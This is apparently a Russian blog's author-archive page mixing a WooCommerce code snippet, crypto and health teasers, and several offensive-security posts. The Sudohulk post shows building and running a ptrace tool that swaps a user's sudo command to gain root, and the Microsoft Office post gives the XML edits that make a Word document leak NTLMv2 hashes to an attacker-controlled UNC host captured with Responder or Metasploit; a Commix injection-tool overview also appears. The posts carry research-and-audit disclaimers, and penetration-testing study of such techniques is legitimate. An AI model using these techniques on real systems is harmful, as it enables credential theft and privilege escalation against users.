Архив автора: admin

Как получить полный список категорий товаров в WooCommerce

Если вы хотите получить полный список категорий товаров на вашем WordPress сайте, то этот учебник для вас, здесь мы собираемся рассказать, как получить полный список категорий товаров в WooCommerce с помощью функции WooCommerce get_terms().

Скопируйте приведенный ниже код и добавьте его в конце файла functions.php.

$args = array(

    'number'     => $number,

    'orderby'    => $orderby,

    'order'      => $order,

    'hide_empty' => $hide_empty,

    'include'    => $ids

);

 

$product_categories = get_terms( 'product_cat', $args );

 

$count = count($product_categories);

 

if ( $count > 0 ){

     echo "<ul>";

     foreach ( $product_categories as $product_category ) {

       echo '<li><a href="' . get_term_link( $product_category ) . '">' .

        $product_category->name . '</li>';

        

     }

 

     echo "</ul>";

 

}

 



2018-03-13T17:57:24
Лучшие учебники по Wodpress

Перспективы Ripple: сотрудничество с Amazon и банками Японии

Слухи о сотрудничестве Ripple и Amazon стали распространяться после того, как Amazon зарегистрировал три новых домена. Разговоры вокруг криптовалюты не стихают и по поводу сотрудничества с Японским банковским Консорциумом. Несмотря на снижение курса, аналитики представляют Ripple все более привлекательным финансовым инструментом. По их мнению, инвестиции в Ripple в долгосрочной перспективе могут иметь больший доход, чем ожидалось. Читать

Sudohulk попробуйте повысить привилегию изменением команды sudo

Этот инструмент меняет команду sudo, подключая sysall execve с помощью ptrace, протестирован под bash и zsh

Поддерживаемые архитектуры:

  • x86_64
  • x86
  • arm

Как использовать

 # make

cc -Wall -Wextra -O2 -c -o bin/sh_remotedata.o src/sh_remotedata.c

cc -Wall -Wextra -O2 -c -o bin/sh_string.o src/sh_string.c

cc -Wall -Wextra -O2 -c -o bin/sudohulk.o src/sudohulk.c

cc -Wall -Wextra -O2 -o sudohulk bin/sh_remotedata.o bin/sh_string.o bin/sudohulk.o

$ ./sudohulk

sudohulk [-qdk] PID COMMAND [ARGS]



Options:

-q quit when change a command

-d run in background

-k keep original command line (appending to new) 

Заметки

PID = bash или zsh pid

Чтобы присоединить текущую сессию, используйте -d, например:

 # ./sudohulk -qd $$ id 

running in background, pid:20899

 # sudo ls -lah

[sudo] senha para mmxm:

uid=0(root) gid=0(root) grupos=0(root) 

Демо

asciicast

Скачать Sudohulk

¯_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.



2018-03-13T14:55:40
Медиа

Microsoft Office – Хэш NTLM через Frameset

Офисные документы Microsoft играют жизненно важную роль в оценке этичного хакера или тестироващика на проникновение, поскольку обычно они используются, чтобы получить некоторую начальную точку опоры во внутренней сети клиента.

Пребывание под радаром также является ключевым элементом, и это может быть достигнуто только путем злоупотребления законными функциональными возможностями Windows или доверенного приложения, такого как офис Microsoft.

Исторически Microsoft Word использовался как HTML-редактор.

Это означает, что он может поддерживать HTML-элементы, такие как framesets.

Поэтому можно связать документ Microsoft Word с UNC-контуром и расчесывать его с помощью responder, чтобы захватывать хеши NTLM извне.

Документы Word с расширением docx представляют собой zip-файл, который содержит различные XML-документы.

Эти файлы XML управляют темой, шрифтами, настройками документа и веб-настройками.

Используя 7-zip, можно открыть этот архив, чтобы изучить эти файлы:

Папка слова содержит файл, который называется webSettings.xml.

Этот файл необходимо изменить, чтобы включить набор фреймов.

Добавление следующего кода создаст ссылку на другой файл.

<w:frameset>

<w:framesetSplitbar>

<w:w w:val="60"/>

<w:color w:val="auto"/>

<w:noBorder/>

</w:framesetSplitbar>

<w:frameset>

<w:frame>

<w:name w:val="3"/>

<w:sourceFileName r:id="rId1"/>

<w:linkedToFile/>

</w:frame>

</w:frameset>

</w:frameset>

Новый файл webSettings.xml, содержащий набор фреймов, должен быть добавлен обратно в архив, чтобы предыдущая версия была перезаписана.

Необходимо создать новый файл (webSettings.xml.rels), чтобы содержать идентификатор отношения (rId1) UNC-путь и TargetMode, если он является внешним или внутренним.

 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<Relationships

xmlns="http://schemas.openxmlformats.org/package/2006/relationships">

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\192.168.1.169Microsoft_Office_Updates.docx" TargetMode="External"/>

</Relationships> 

Каталог _rels содержит связанные отношения документа с точки зрения шрифтов, стилей, тем, настроек и т. д.

Посадка нового файла в этом каталоге завершит связь отношений, которая была создана ранее через набор фреймов.

Теперь, когда документ Word был вооружен для подключения к UNC-пути через Интернет, responder может быть настроен для захвата хешей NTLM.

Как только целевой пользователь откроет документ документа, он попытается подключиться к UNC-пути.

Ответчик получит хэш NTLMv2 пользователя.

В качестве альтернативы Metasploit Framework может использоваться вместо ответчика, чтобы захватить хэш пароля.

 auxiliary/server/capture/smb 

Хеши NTLMv2 будут записаны в Metasploit после открытия документа.

Вывод

Этот метод позволяет атакующему захватить хэши паролей домена у пользователей, которые могут привести к внутреннему доступу к сети, если двухфакторная аутентификация для доступа к VPN не включена и существует слабая политика паролей.

Кроме того, если целевой пользователь является повышенной учетной записью, такой как локальный администратор или администратор домена, этот метод можно комбинировать с реле SMB, чтобы получить сеанс Meterpreter.

¯_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.



2018-03-13T14:33:36
Аудит ИБ

Инструмент инъекции и эксплуатации команд Command Injection and Exploitation AIO OS: Commix

Давайте посмотрим на еще один интересный инструмент для пентеста или этичного взлома!

Commix (сокращение от [comm] и [i] njection e [x] ploiter) – это автоматизированный инструмент, написанный Anastasios Stasinopoulos (@ancst), который может быть использован от веб-разработчиков, тестировщиков проникновения или даже исследователей безопасности для тестирования веб- с целью поиска ошибок, ошибок или уязвимостей, связанных с атаками с помощью команды.

Используя этот инструмент, очень легко найти и использовать уязвимость при инъекции команд в определенном уязвимом параметре или HTTP-заголовке.

Особенности

Легко использовать

Очень легко найти и использовать уязвимость, вызванную командой, в определенном уязвимом параметре или заголовке HTTP.

Аккумуляторы в комплекте

Все, что вам нужно для эффективной атаки на команды операционной системы для нескольких операционных систем и приложений, включено.

модульная

Вы можете разрабатывать и легко импортировать свои собственные модули, чтобы увеличить возможности коммикса и / или адаптировать его к вашим потребностям.

совместимый

Он совместим с несколькими инструментами для тестирования проникновения и freamworks (например, Metasploit Framework, BurpSuite, SQLMap и т. д.), Тем самым увеличивается вероятность успеха теста на проникновение.

Все платформы

Это приложение написано на Python! Не нужно ничего компилировать, для работы с Commix для Linux (), Mac OSX () и Windows () требуется установить только Python (версия 2.6.x или 2.7.x).

Бесплатный / Открытый исходный код

Это бесплатный инструмент. Так и проект с открытым исходным кодом, лицензированный по лицензии GPLv3

 

 

 

 

Правовая справка



Этот инструмент предназначен только для тестирования и академических целей и может использоваться только там, где дано строгое согласие. Не используйте его в незаконных целях!



Требования

Для запуска этой программы требуется Python версии 2.6.x или 2.7.x.

Установка

Загрузите commix, клонируя репозиторий Git:

 # git clone https://github.com/commixproject/commix.git commix 

Commix поставляется в официальных репозиториях следующих дистрибутивов Linux, поэтому вы можете использовать диспетчер пакетов для его установки!

Commix также поставляется в виде плагина на следующих платформах тестирования на проникновение:

Поддерживаемые платформы

  • Linux
  • Mac OS X
  • Windows (экспериментальный)

Применение

Чтобы получить список всех опций и переключателей, используйте:

 # python commix.py -h 

Скачать commix

 



2018-03-13T13:29:44
Медиа

Восемь упражнений против шейного остеохондроза

Первые проявления шейного остеохондроза — боли в спине, головные боли, головокружение, «мушки» в глазах, ухудшение слуха или шумы, а также покачивание при ходьбе в результате нарушения координации. 

Чтобы этого не случилось, предлагаем нехитрые упражнения, которые помогут вам победить остеохондроз и сберечь здоровье. Читать